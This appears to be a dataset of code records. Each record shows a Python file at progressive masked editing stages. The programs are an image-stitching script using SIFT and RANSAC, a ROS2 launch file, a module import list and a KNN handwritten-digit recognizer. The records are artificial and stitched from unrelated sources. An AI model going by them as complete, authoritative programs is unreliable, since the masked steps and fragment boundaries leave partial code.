sift_descriptor(rightimg)\n matches = calculate_distance(kp1, kp2, dsp1, dsp2, thres)\n H_matrix = ransac(leftimg, rightimg, matches, thres_ransac)\n stitched_img = warp_images(rightimgcolor, leftimgcolor, H_matrix)\n return stitched_img\n\n\ndef main_2pic():\n dirs = 'MP3_part1_data/' + 'park/'\n leftimg = readimg(dirs, 'left.jpg')\n rightimg = readimg(dirs, 'right.jpg')\n leftimgcolor = readimg_color(dirs, 'left.jpg')\n rightimgcolor = readimg_color(dirs, 'right.jpg')\n stitched_img = main(leftimg, rightimg, leftimgcolor, rightimgcolor)\n plt.imshow(stitched_img)\n plt.show()\n\n\ndef main_3pic():\n dirs = 'MP3_part1_data/' + 'pier/'\n leftimg = readimg(dirs, '1.jpg')\n midimg = readimg(dirs, '2.jpg')\n rightimg = readimg(dirs, '3.jpg')\n leftimgcolor = readimg_color(dirs, '1.jpg')\n midimgcolor = readimg_color(dirs, '2.jpg')\n rightimgcolor = readimg_color(dirs, '3.jpg')\n stitched1 = main(leftimg, midimg, leftimgcolor, midimgcolor)\n plt.imshow(stitched1)\n plt.show()\n grey_stitch1 = cv2.cvtColor(stitched1, cv2.COLOR_RGB2GRAY)\n stitched2 = main(grey_stitch1, rightimg, stitched1, rightimgcolor)\n plt.imshow(stitched2)\n plt.show()\n\n\nif __name__ == '__main__':\n main_3pic()\n",
"step-4": "import time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport matplotlib.image as mpimg\nimport random\nimport skimage\nimport scipy\nfrom PIL import Image\n\n\ndef readimg(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n return img\n\n\ndef readimg_color(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.normalize(img.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\n return img\n\n\ndef sift_descriptor(img):\n sift = cv2.xfeatures2d.SIFT_create()\n kp, dsp = sift.detectAndCompute(img, None)\n return kp, dsp\n\n\ndef show_sift(kp, img):\n copyimg = img.copy()\n copyimg = cv2.drawKeypoints(img, kp, copyimg)\n plt.imshow(copyimg)\n plt.show()\n\n\ndef calculate_distance(kp1, kp2, dsp1, dsp2, num_threshold):\n dist = scipy.spatial.distance.cdist(dsp1, dsp2, 'sqeuclidean')\n idx1 = np.where(dist < num_threshold)[0]\n idx2 = np.where(dist < num_threshold)[1]\n coord1 = np.array([kp1[idx].pt for idx in idx1])\n coord2 = np.array([kp2[idx].pt for idx in idx2])\n match_coords = np.concatenate((coord1, coord2), axis=1)\n return match_coords\n\n\ndef get_errors(matches, H):\n num_pairs = len(matches)\n p1 = np.concatenate((matches[:, 0:2], np.ones((1, num_pairs)).T), axis=1)\n p2 = matches[:, 2:4]\n transformed_p1 = np.zeros((num_pairs, 2))\n for i in range(num_pairs):\n transformed_p1[i] = (np.matmul(H, p1[i]) / np.matmul(H, p1[i])[-1])[0:2\n ]\n errors = np.linalg.norm(p2 - transformed_p1, axis=1) ** 2\n return errors\n\n\ndef compute_H(subset):\n A = []\n for i in range(subset.shape[0]):\n p1 = np.append(subset[i][0:2], 1)\n p2 = np.append(subset[i][2:4], 1)\n row1 = [0, 0, 0, p1[0], p1[1], p1[2], -p2[1] * p1[0], -p2[1] * p1[1\n ], -p2[1] * p1[2]]\n row2 = [p1[0], p1[1], p1[2], 0, 0, 0, -p2[0] * p1[0], -p2[0] * p1[1\n ], -p2[0] * p1[2]]\n A.append(row1)\n A.append(row2)\n A = np.array(A)\n U, s, V = np.linalg.svd(A)\n H = V[len(V) - 1].reshape(3, 3)\n H = H / H[2, 2]\n return H\n\n\ndef show_inlier_matches(img1, img2, inliers):\n print('num of inliers shown in the matching: ' + str(len(inliers)))\n h1, w1 = img1.shape\n h2, w2 = img2.shape\n vis = np.zeros((max(h1, h2), w1 + w2), np.uint8)\n vis[:, :w1] = img1\n vis[:h2, w1:] = img2\n fig, ax = plt.subplots()\n ax.imshow(vis)\n ax.plot([inliers[:, 0], inliers[:, 2] + w1], [inliers[:, 1], inliers[:, 3]]\n )\n plt.show()\n\n\ndef ransac(img1, img2, matches, thres_ransac):\n itertimes = 1000\n inliners = 0\n max_inliners = 0\n for iter in range(0, itertimes):\n subset_idx = random.sample(range(matches.shape[0]), k=4)\n subset = matches[subset_idx]\n H = compute_H(subset)\n if np.linalg.matrix_rank(H) < 3:\n continue\n errors = get_errors(matches, H)\n idx = np.where(errors < thres_ransac)[0]\n inlinerspts = matches[idx]\n inliners = len(inlinerspts)\n if inliners >= max_inliners:\n which_inliners = inlinerspts.copy()\n max_inliners = inliners\n best_H = H.copy()\n avg_residual = sum(get_errors(matches[idx], H)) / inliners\n print('num of inliners: ' + str(max_inliners) + ' average residual: ' +\n str(avg_residual))\n show_inlier_matches(img1, img2, which_inliners)\n return best_H\n\n\ndef warp_images(image0, image1, H):\n transform = skimage.transform.ProjectiveTransform(H)\n warp = skimage.transform.warp\n r, c = image1.shape[:2]\n corners = np.array([[0, 0], [0, r], [c, 0], [c, r]])\n warped_corners = transform(corners)\n all_corners = np.vstack((warped_corners, corners))\n corner_min = np.min(all_corners, axis=0)\n corner_max = np.max(all_corners, axis=0)\n output_shape = corner_max - corner_min\n output_shape = np.ceil(output_shape[::-1])\n offset = skimage.transform.SimilarityTransform(translation=-corner_min)\n image0_ = warp(image0, offset.inverse, output_shape=output_shape, cval=-1)\n image1_ = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=-1)\n image0_zeros = warp(image0, offset.inverse, output_shape=output_shape,\n cval=0)\n image1_zeros = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=0)\n overlap = (image0_ != -1.0).astype(int) + (image1_ != -1.0).astype(int)\n overlap += (overlap < 1).astype(int)\n merged = (image0_zeros + image1_zeros) / overlap\n im = Image.fromarray((255 * merged).astype('uint8'), mode='RGB')\n im = np.asarray(im)\n return im\n\n\ndef main(leftimg, rightimg, leftimgcolor, rightimgcolor):\n thres = 9000\n thres_ransac = 1.0\n kp1, dsp1 = sift_descriptor(leftimg)\n kp2, dsp2 = sift_descriptor(rightimg)\n matches = calculate_distance(kp1, kp2, dsp1, dsp2, thres)\n H_matrix = ransac(leftimg, rightimg, matches, thres_ransac)\n stitched_img = warp_images(rightimgcolor, leftimgcolor, H_matrix)\n return stitched_img\n\n\ndef main_2pic():\n dirs = 'MP3_part1_data/' + 'park/'\n leftimg = readimg(dirs, 'left.jpg')\n rightimg = readimg(dirs, 'right.jpg')\n leftimgcolor = readimg_color(dirs, 'left.jpg')\n rightimgcolor = readimg_color(dirs, 'right.jpg')\n stitched_img = main(leftimg, rightimg, leftimgcolor, rightimgcolor)\n plt.imshow(stitched_img)\n plt.show()\n\n\ndef main_3pic():\n dirs = 'MP3_part1_data/' + 'pier/'\n leftimg = readimg(dirs, '1.jpg')\n midimg = readimg(dirs, '2.jpg')\n rightimg = readimg(dirs, '3.jpg')\n leftimgcolor = readimg_color(dirs, '1.jpg')\n midimgcolor = readimg_color(dirs, '2.jpg')\n rightimgcolor = readimg_color(dirs, '3.jpg')\n stitched1 = main(leftimg, midimg, leftimgcolor, midimgcolor)\n plt.imshow(stitched1)\n plt.show()\n grey_stitch1 = cv2.cvtColor(stitched1, cv2.COLOR_RGB2GRAY)\n stitched2 = main(grey_stitch1, rightimg, stitched1, rightimgcolor)\n plt.imshow(stitched2)\n plt.show()\n\n\nif __name__ == '__main__':\n main_3pic()\n",
"step-5": "import time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport matplotlib.image as mpimg\nimport random\nimport skimage\nimport scipy\nfrom PIL import Image\n\ndef readimg(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n return img\n\ndef readimg_color(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.normalize(img.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\n return img\n\ndef sift_descriptor(img):\n sift = cv2.xfeatures2d.SIFT_create()\n kp, dsp = sift.detectAndCompute(img, None)\n\n return kp, dsp\n\ndef show_sift(kp, img):\n # show the img with descriptors\n copyimg = img.copy()\n copyimg = cv2.drawKeypoints(img, kp, copyimg)\n plt.imshow(copyimg)\n plt.show()\n\ndef calculate_distance(kp1, kp2, dsp1, dsp2, num_threshold):\n # fast computation of Euclidean distance between each descriptors\n dist = scipy.spatial.distance.cdist(dsp1, dsp2, 'sqeuclidean')\n # find the matching coordinates\n idx1 = np.where(dist < num_threshold)[0]\n idx2 = np.where(dist < num_threshold)[1]\n coord1 = np.array([kp1[idx].pt for idx in idx1])\n coord2 = np.array([kp2[idx].pt for idx in idx2])\n # put into pairs of coords\n match_coords = np.concatenate((coord1, coord2), axis=1)\n\n return match_coords\n\ndef get_errors(matches, H):\n\t# difference between original img2 points and transformed img1 points with H\n num_pairs = len(matches)\n # all matching points in img1\n p1 = np.concatenate((matches[:, 0:2], np.ones((1, num_pairs)).T), axis=1)\n # all matching points in img2\n p2 = matches[:, 2:4]\n\n # Transform every point in p1 to estimate p2.\n transformed_p1 = np.zeros((num_pairs, 2))\n for i in range(num_pairs):\n transformed_p1[i] = (np.matmul(H, p1[i]) / np.matmul(H, p1[i])[-1])[0:2]\n\n # Compute error of each matching pair\n errors = np.linalg.norm(p2 - transformed_p1, axis=1) ** 2\n return errors\n\ndef compute_H(subset):\n # calculate the fitted homography\n A = []\n\n for i in range(subset.shape[0]):\n p1 = np.append(subset[i][0:2], 1)\n p2 = np.append(subset[i][2:4], 1)\n \n row1 = [0, 0, 0, p1[0], p1[1], p1[2], -p2[1]*p1[0], -p2[1]*p1[1], -p2[1]*p1[2]]\n row2 = [p1[0], p1[1], p1[2], 0, 0, 0, -p2[0]*p1[0], -p2[0]*p1[1], -p2[0]*p1[2]]\n A.append(row1)\n A.append(row2)\n\n A = np.array(A)\n\n U, s, V = np.linalg.svd(A)\n H = V[len(V)-1].reshape(3, 3)\n\n # normalize\n H = H / H[2, 2]\n return H\n\ndef show_inlier_matches(img1, img2, inliers):\n print(\"num of inliers shown in the matching: \" + str(len(inliers)))\n h1, w1 = img1.shape\n h2, w2 = img2.shape\n\n vis = np.zeros((max(h1, h2), w1 + w2), np.uint8)\n vis[:, :w1] = img1\n vis[:h2, w1:] = img2\n\n fig, ax = plt.subplots()\n ax.imshow(vis)\n ax.plot([inliers[:,0], inliers[:,2] + w1],[inliers[:,1], inliers[:,3]])\n plt.show()\n\ndef ransac(img1, img2, matches, thres_ransac):\n itertimes = 1000\n inliners = 0\n max_inliners = 0\n\n for iter in range(0, itertimes):\n subset_idx = random.sample(range(matches.shape[0]), k=4)\n subset = matches[subset_idx]\n\n H = compute_H(subset)\n\n # check if it is full rank\n if np.linalg.matrix_rank(H) < 3:\n continue\n\n # the norm of error caused if we choose the above subset\n errors = get_errors(matches, H)\n idx = np.where(errors < thres_ransac)[0]\n inlinerspts = matches[idx]\n\n # find the best number of inliners \n inliners = len(inlinerspts)\n if inliners >= max_inliners:\n which_inliners = inlinerspts.copy()\n max_inliners = inliners\n best_H = H.copy()\n \n avg_residual = sum(get_errors(matches[idx], H)) / inliners\n\n print(\"num of inliners: \" + str(max_inliners) + \" average residual: \" + str(avg_residual))\n show_inlier_matches(img1, img2, which_inliners)\n return best_H\n\n# function provided by Maghav at Piazza @450\ndef warp_images(image0, image1, H):\n transform = skimage.transform.ProjectiveTransform(H)\n warp = skimage.transform.warp\n\n r, c = image1.shape[:2]\n # Note that transformations take coordinates in (x, y) format,\n # not (row, column), in order to be consistent with most literature\n corners = np.array([[0, 0],\n [0, r],\n [c, 0],\n [c, r]])\n\n # Warp the image corners to their new positions\n warped_corners = transform(corners)\n\n # Find the extents of both the reference image and the warped\n # target image\n all_corners = np.vstack((warped_corners, corners))\n\n corner_min = np.min(all_corners, axis=0)\n corner_max = np.max(all_corners, axis=0)\n\n output_shape = (corner_max - corner_min)\n output_shape = np.ceil(output_shape[::-1])\n\n offset = skimage.transform.SimilarityTransform(translation=-corner_min)\n\n image0_ = warp(image0, offset.inverse, output_shape=output_shape, cval=-1)\n\n image1_ = warp(image1, (transform + offset).inverse, output_shape=output_shape, cval=-1)\n\n image0_zeros = warp(image0, offset.inverse, output_shape=output_shape, cval=0)\n\n image1_zeros = warp(image1, (transform + offset).inverse, output_shape=output_shape, cval=0)\n\n overlap = (image0_ != -1.0 ).astype(int) + (image1_ != -1.0).astype(int)\n overlap += (overlap < 1).astype(int)\n merged = (image0_zeros+image1_zeros)/overlap\n\n im = Image.fromarray((255*merged).astype('uint8'), mode='RGB')\n im = np.asarray(im)\n\n return im\n\ndef main(leftimg, rightimg, leftimgcolor, rightimgcolor):\n # using 7000, 0.5 for 2 pic; 9000, 1.0 for 3 pic\n thres = 9000\n thres_ransac = 1.0\n\n kp1, dsp1 = sift_descriptor(leftimg)\n kp2, dsp2 = sift_descriptor(rightimg)\n\n # get all matching points\n matches = calculate_distance(kp1, kp2, dsp1, dsp2, thres)\n\n H_matrix = ransac(leftimg, rightimg, matches, thres_ransac)\n\n stitched_img = warp_images(rightimgcolor, leftimgcolor, H_matrix)\n\n return stitched_img\n\ndef main_2pic():\n dirs = 'MP3_part1_data/' + 'park/'\n leftimg = readimg(dirs, 'left.jpg')\n rightimg = readimg(dirs, 'right.jpg')\n leftimgcolor = readimg_color(dirs, 'left.jpg')\n rightimgcolor = readimg_color(dirs, 'right.jpg')\n\n stitched_img = main(leftimg, rightimg, leftimgcolor, rightimgcolor)\n\n plt.imshow(stitched_img)\n plt.show()\n\ndef main_3pic():\n dirs = 'MP3_part1_data/' + 'pier/' # ledge pier hill\n leftimg = readimg(dirs, '1.jpg')\n midimg = readimg(dirs, '2.jpg')\n rightimg = readimg(dirs, '3.jpg')\n leftimgcolor = readimg_color(dirs, '1.jpg')\n midimgcolor = readimg_color(dirs, '2.jpg')\n rightimgcolor = readimg_color(dirs, '3.jpg')\n\n stitched1 = main(leftimg, midimg, leftimgcolor, midimgcolor)\n\n plt.imshow(stitched1)\n plt.show()\n\n grey_stitch1 = cv2.cvtColor(stitched1, cv2.COLOR_RGB2GRAY)\n\n stitched2 = main(grey_stitch1, rightimg, stitched1, rightimgcolor)\n\n plt.imshow(stitched2)\n plt.show()\n\nif __name__ == '__main__':\n\t#main_2pic()\n\tmain_3pic()\n \n",
"step-ids": [
9,
11,
14,
15,
16
]
}
|
[
9,
11,
14,
15,
16
] |
from launch import LaunchDescription
from launch_ros.actions import Node
import os
params = os.path.join('INSERT_PATH/src/beckhoff_ros', 'config', 'params.yaml')
def generate_launch_description():
return LaunchDescription([Node(package='beckhoff_ros', executable=
'beckhoff_ros_node', name='beckhoff_ros_node', parameters=[params],
output='screen')])
|
normal
|
{
"blob_id": "ae4f8eb71939ff212d05d12f65edeaecf66f2205",
"index": 4874,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef generate_launch_description():\n return LaunchDescription([Node(package='beckhoff_ros', executable=\n 'beckhoff_ros_node', name='beckhoff_ros_node', parameters=[params],\n output='screen')])\n",
"step-3": "<mask token>\nparams = os.path.join('INSERT_PATH/src/beckhoff_ros', 'config', 'params.yaml')\n\n\ndef generate_launch_description():\n return LaunchDescription([Node(package='beckhoff_ros', executable=\n 'beckhoff_ros_node', name='beckhoff_ros_node', parameters=[params],\n output='screen')])\n",
"step-4": "from launch import LaunchDescription\nfrom launch_ros.actions import Node\nimport os\nparams = os.path.join('INSERT_PATH/src/beckhoff_ros', 'config', 'params.yaml')\n\n\ndef generate_launch_description():\n return LaunchDescription([Node(package='beckhoff_ros', executable=\n 'beckhoff_ros_node', name='beckhoff_ros_node', parameters=[params],\n output='screen')])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from . import chequeador_camion
from . import chequeador_camion_modelo
from . import chequeador_destino_tipo
from . import chequeador_destino
from . import chequeador_origen
from . import chequeador_minerales
|
flexible
|
{
"blob_id": "bf7319996043a41b7d0ef4e6098c3609e5db101e",
"index": 9809,
"step-1": "<mask token>\n",
"step-2": "from . import chequeador_camion\nfrom . import chequeador_camion_modelo\nfrom . import chequeador_destino_tipo\nfrom . import chequeador_destino\nfrom . import chequeador_origen\nfrom . import chequeador_minerales\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
'''
手写识别系统
构建识别类
Recognize
调用getResult()函数即可
'''
import operator
from numpy import *
from PIL import Image
from os import listdir
from io import BytesIO
def classify(inX, dataSet, labels, k):
dataSetSize = dataSet.shape[0] #训练数据集的行数
# 计算距离
diffMat = tile(inX, (dataSetSize,1)) - dataSet
sqDiffMat = diffMat**2
sqDistances = sqDiffMat.sum(axis=1)
distances = sqDistances**0.5
# 返还距离排序的索引
sortedDistIndicies = distances.argsort()
classCount={}
for i in range(k):
voteIlabel = labels[sortedDistIndicies[i]]
classCount[voteIlabel] = classCount.get(voteIlabel,0) + 1
sortedClassCount = sorted(classCount.items(),
key=operator.itemgetter(1), reverse=True)
return sortedClassCount[0][0]
# 将图片转化为行向量
def img2vector(filename):
returnVect = zeros((1,1024))
fr = open(filename)
for i in range(32):
lineStr = fr.readline()
for j in range(32):
returnVect[0,32*i+j] = int(lineStr[j])
return returnVect
'''
如何让加载训练集值运行一次?
'''
hwLabels , trainingMat = [] , []
def loadTrainingSet(dir_trainingSet):
print('把trainingDigits文件夹里的所有训练集导入')
#把trainingDigits文件夹里的所有训练集导入
trainingFileList = listdir(dir_trainingSet)
#print(trainingFileList)
m = len(trainingFileList)
trainingMat = zeros((m,1024)) # 初始化训练矩阵
for i in range(m):
# 此三步,将所有训练集的名称分割只取出第一个
fileNameStr = trainingFileList[i]
fileStr = fileNameStr.split('.')[0]
classNumStr = int(fileStr.split('_')[0])
# 得到一个由训练集 名称首个number的矩阵
hwLabels.append(classNumStr)
# 每一个 训练集的 txt 都转成一个 1行1025列的向量
trainingMat[i,:] = img2vector(dir_trainingSet+'/%s' % fileNameStr)
return hwLabels , trainingMat
def getResult(filename,trainingDigits):
'''
filename 测试集dir
trainingDigits 训练集dir
'''
hwLabels , trainingMat = loadTrainingSet(trainingDigits)
# 为输入的数字图片分类,读取图片为
with open(filename, 'rb') as f:
filePath = f.read()
# 此时 filePath 是十六进制字节 如: \x7f\x12\xdf
fileNameStr = changeImg2Text(filePath,filename)
inputVect = img2vector(fileNameStr)
classifierResult = classify(inputVect, trainingMat, hwLabels, 3)
print( '预测手写数字识别为:',classifierResult)
return classifierResult
# 原demo里有这句话,可以这句话,会将预测的图片失效,暂注释 保留
#with open(filename, 'w') as f:
# f.write(str(classifierResult))
# 处理初始图形
def changeImg2Text(filePath,filename):
# 就是字符串 \ 分割后(其中 \\ 是加了转译),取最后一个 2.jpg,再 以 . 分割取 名字
fileNameStr = filename.split('\\')[-1].split('.')[0] + '.txt'
fr = open(fileNameStr, 'w')
#读图片转矩阵,Python 3 要加 BytesIO(filePath)
'''
https://codedump.io/share/aztOtkSsnO2U/1/python-valueerror-embedded-null-byte-when-reading-png-file-from-bash-pipe
'''
im = Image.open(BytesIO(filePath))
#print(im) # <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=206x376 at 0x8D99C50>
im2 = im.resize((32, 32), Image.ANTIALIAS)
img = array(im2)
print( img.shape , Image.ANTIALIAS )
m, n = img.shape[:2]
for i in range(m):
for j in range(n):
R, G, B = img[i, j, :]
# 因为,图片首先要 处理成灰度图,所以根据,灰度进而识别
'''
这部分的颜色用 PhotoShop 取色器,调参。
RGB的值选择 白色点 和 目标颜色点的中点的RGB
'''
#if R < 40 and G < 40 and B < 40: # 这些参数时对于黑白色的区分
#if R < 245 and G < 153 and B < 120: # 对 0 文件里,橙色图片的划分
if R < 185 and G < 100 and B < 100: # 对 2 文件里,灰色图片的划分
fr.write('1')
else:
fr.write('0')
fr.write('\n')
fr.close()
return fileNameStr
|
normal
|
{
"blob_id": "1ab5147ed8ce808de9667052b6d17f320d62484f",
"index": 4694,
"step-1": "<mask token>\n\n\ndef classify(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0]\n diffMat = tile(inX, (dataSetSize, 1)) - dataSet\n sqDiffMat = diffMat ** 2\n sqDistances = sqDiffMat.sum(axis=1)\n distances = sqDistances ** 0.5\n sortedDistIndicies = distances.argsort()\n classCount = {}\n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1\n ), reverse=True)\n return sortedClassCount[0][0]\n\n\n<mask token>\n\n\ndef loadTrainingSet(dir_trainingSet):\n print('把trainingDigits文件夹里的所有训练集导入')\n trainingFileList = listdir(dir_trainingSet)\n m = len(trainingFileList)\n trainingMat = zeros((m, 1024))\n for i in range(m):\n fileNameStr = trainingFileList[i]\n fileStr = fileNameStr.split('.')[0]\n classNumStr = int(fileStr.split('_')[0])\n hwLabels.append(classNumStr)\n trainingMat[i, :] = img2vector(dir_trainingSet + '/%s' % fileNameStr)\n return hwLabels, trainingMat\n\n\n<mask token>\n\n\ndef changeImg2Text(filePath, filename):\n fileNameStr = filename.split('\\\\')[-1].split('.')[0] + '.txt'\n fr = open(fileNameStr, 'w')\n \"\"\"\n https://codedump.io/share/aztOtkSsnO2U/1/python-valueerror-embedded-null-byte-when-reading-png-file-from-bash-pipe\n \"\"\"\n im = Image.open(BytesIO(filePath))\n im2 = im.resize((32, 32), Image.ANTIALIAS)\n img = array(im2)\n print(img.shape, Image.ANTIALIAS)\n m, n = img.shape[:2]\n for i in range(m):\n for j in range(n):\n R, G, B = img[i, j, :]\n \"\"\"\n 这部分的颜色用 PhotoShop 取色器,调参。\n RGB的值选择 白色点 和 目标颜色点的中点的RGB\n \"\"\"\n if R < 185 and G < 100 and B < 100:\n fr.write('1')\n else:\n fr.write('0')\n fr.write('\\n')\n fr.close()\n return fileNameStr\n",
"step-2": "<mask token>\n\n\ndef classify(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0]\n diffMat = tile(inX, (dataSetSize, 1)) - dataSet\n sqDiffMat = diffMat ** 2\n sqDistances = sqDiffMat.sum(axis=1)\n distances = sqDistances ** 0.5\n sortedDistIndicies = distances.argsort()\n classCount = {}\n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1\n ), reverse=True)\n return sortedClassCount[0][0]\n\n\ndef img2vector(filename):\n returnVect = zeros((1, 1024))\n fr = open(filename)\n for i in range(32):\n lineStr = fr.readline()\n for j in range(32):\n returnVect[0, 32 * i + j] = int(lineStr[j])\n return returnVect\n\n\n<mask token>\n\n\ndef loadTrainingSet(dir_trainingSet):\n print('把trainingDigits文件夹里的所有训练集导入')\n trainingFileList = listdir(dir_trainingSet)\n m = len(trainingFileList)\n trainingMat = zeros((m, 1024))\n for i in range(m):\n fileNameStr = trainingFileList[i]\n fileStr = fileNameStr.split('.')[0]\n classNumStr = int(fileStr.split('_')[0])\n hwLabels.append(classNumStr)\n trainingMat[i, :] = img2vector(dir_trainingSet + '/%s' % fileNameStr)\n return hwLabels, trainingMat\n\n\ndef getResult(filename, trainingDigits):\n \"\"\"\n filename 测试集dir\n trainingDigits 训练集dir\n \"\"\"\n hwLabels, trainingMat = loadTrainingSet(trainingDigits)\n with open(filename, 'rb') as f:\n filePath = f.read()\n fileNameStr = changeImg2Text(filePath, filename)\n inputVect = img2vector(fileNameStr)\n classifierResult = classify(inputVect, trainingMat, hwLabels, 3)\n print('预测手写数字识别为:', classifierResult)\n return classifierResult\n\n\ndef changeImg2Text(filePath, filename):\n fileNameStr = filename.split('\\\\')[-1].split('.')[0] + '.txt'\n fr = open(fileNameStr, 'w')\n \"\"\"\n https://codedump.io/share/aztOtkSsnO2U/1/python-valueerror-embedded-null-byte-when-reading-png-file-from-bash-pipe\n \"\"\"\n im = Image.open(BytesIO(filePath))\n im2 = im.resize((32, 32), Image.ANTIALIAS)\n img = array(im2)\n print(img.shape, Image.ANTIALIAS)\n m, n = img.shape[:2]\n for i in range(m):\n for j in range(n):\n R, G, B = img[i, j, :]\n \"\"\"\n 这部分的颜色用 PhotoShop 取色器,调参。\n RGB的值选择 白色点 和 目标颜色点的中点的RGB\n \"\"\"\n if R < 185 and G < 100 and B < 100:\n fr.write('1')\n else:\n fr.write('0')\n fr.write('\\n')\n fr.close()\n return fileNameStr\n",
"step-3": "<mask token>\n\n\ndef classify(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0]\n diffMat = tile(inX, (dataSetSize, 1)) - dataSet\n sqDiffMat = diffMat ** 2\n sqDistances = sqDiffMat.sum(axis=1)\n distances = sqDistances ** 0.5\n sortedDistIndicies = distances.argsort()\n classCount = {}\n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1\n ), reverse=True)\n return sortedClassCount[0][0]\n\n\ndef img2vector(filename):\n returnVect = zeros((1, 1024))\n fr = open(filename)\n for i in range(32):\n lineStr = fr.readline()\n for j in range(32):\n returnVect[0, 32 * i + j] = int(lineStr[j])\n return returnVect\n\n\n<mask token>\nhwLabels, trainingMat = [], []\n\n\ndef loadTrainingSet(dir_trainingSet):\n print('把trainingDigits文件夹里的所有训练集导入')\n trainingFileList = listdir(dir_trainingSet)\n m = len(trainingFileList)\n trainingMat = zeros((m, 1024))\n for i in range(m):\n fileNameStr = trainingFileList[i]\n fileStr = fileNameStr.split('.')[0]\n classNumStr = int(fileStr.split('_')[0])\n hwLabels.append(classNumStr)\n trainingMat[i, :] = img2vector(dir_trainingSet + '/%s' % fileNameStr)\n return hwLabels, trainingMat\n\n\ndef getResult(filename, trainingDigits):\n \"\"\"\n filename 测试集dir\n trainingDigits 训练集dir\n \"\"\"\n hwLabels, trainingMat = loadTrainingSet(trainingDigits)\n with open(filename, 'rb') as f:\n filePath = f.read()\n fileNameStr = changeImg2Text(filePath, filename)\n inputVect = img2vector(fileNameStr)\n classifierResult = classify(inputVect, trainingMat, hwLabels, 3)\n print('预测手写数字识别为:', classifierResult)\n return classifierResult\n\n\ndef changeImg2Text(filePath, filename):\n fileNameStr = filename.split('\\\\')[-1].split('.')[0] + '.txt'\n fr = open(fileNameStr, 'w')\n \"\"\"\n https://codedump.io/share/aztOtkSsnO2U/1/python-valueerror-embedded-null-byte-when-reading-png-file-from-bash-pipe\n \"\"\"\n im = Image.open(BytesIO(filePath))\n im2 = im.resize((32, 32), Image.ANTIALIAS)\n img = array(im2)\n print(img.shape, Image.ANTIALIAS)\n m, n = img.shape[:2]\n for i in range(m):\n for j in range(n):\n R, G, B = img[i, j, :]\n \"\"\"\n 这部分的颜色用 PhotoShop 取色器,调参。\n RGB的值选择 白色点 和 目标颜色点的中点的RGB\n \"\"\"\n if R < 185 and G < 100 and B < 100:\n fr.write('1')\n else:\n fr.write('0')\n fr.write('\\n')\n fr.close()\n return fileNameStr\n",
"step-4": "<mask token>\nimport operator\nfrom numpy import *\nfrom PIL import Image\nfrom os import listdir\nfrom io import BytesIO\n\n\ndef classify(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0]\n diffMat = tile(inX, (dataSetSize, 1)) - dataSet\n sqDiffMat = diffMat ** 2\n sqDistances = sqDiffMat.sum(axis=1)\n distances = sqDistances ** 0.5\n sortedDistIndicies = distances.argsort()\n classCount = {}\n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1\n ), reverse=True)\n return sortedClassCount[0][0]\n\n\ndef img2vector(filename):\n returnVect = zeros((1, 1024))\n fr = open(filename)\n for i in range(32):\n lineStr = fr.readline()\n for j in range(32):\n returnVect[0, 32 * i + j] = int(lineStr[j])\n return returnVect\n\n\n<mask token>\nhwLabels, trainingMat = [], []\n\n\ndef loadTrainingSet(dir_trainingSet):\n print('把trainingDigits文件夹里的所有训练集导入')\n trainingFileList = listdir(dir_trainingSet)\n m = len(trainingFileList)\n trainingMat = zeros((m, 1024))\n for i in range(m):\n fileNameStr = trainingFileList[i]\n fileStr = fileNameStr.split('.')[0]\n classNumStr = int(fileStr.split('_')[0])\n hwLabels.append(classNumStr)\n trainingMat[i, :] = img2vector(dir_trainingSet + '/%s' % fileNameStr)\n return hwLabels, trainingMat\n\n\ndef getResult(filename, trainingDigits):\n \"\"\"\n filename 测试集dir\n trainingDigits 训练集dir\n \"\"\"\n hwLabels, trainingMat = loadTrainingSet(trainingDigits)\n with open(filename, 'rb') as f:\n filePath = f.read()\n fileNameStr = changeImg2Text(filePath, filename)\n inputVect = img2vector(fileNameStr)\n classifierResult = classify(inputVect, trainingMat, hwLabels, 3)\n print('预测手写数字识别为:', classifierResult)\n return classifierResult\n\n\ndef changeImg2Text(filePath, filename):\n fileNameStr = filename.split('\\\\')[-1].split('.')[0] + '.txt'\n fr = open(fileNameStr, 'w')\n \"\"\"\n https://codedump.io/share/aztOtkSsnO2U/1/python-valueerror-embedded-null-byte-when-reading-png-file-from-bash-pipe\n \"\"\"\n im = Image.open(BytesIO(filePath))\n im2 = im.resize((32, 32), Image.ANTIALIAS)\n img = array(im2)\n print(img.shape, Image.ANTIALIAS)\n m, n = img.shape[:2]\n for i in range(m):\n for j in range(n):\n R, G, B = img[i, j, :]\n \"\"\"\n 这部分的颜色用 PhotoShop 取色器,调参。\n 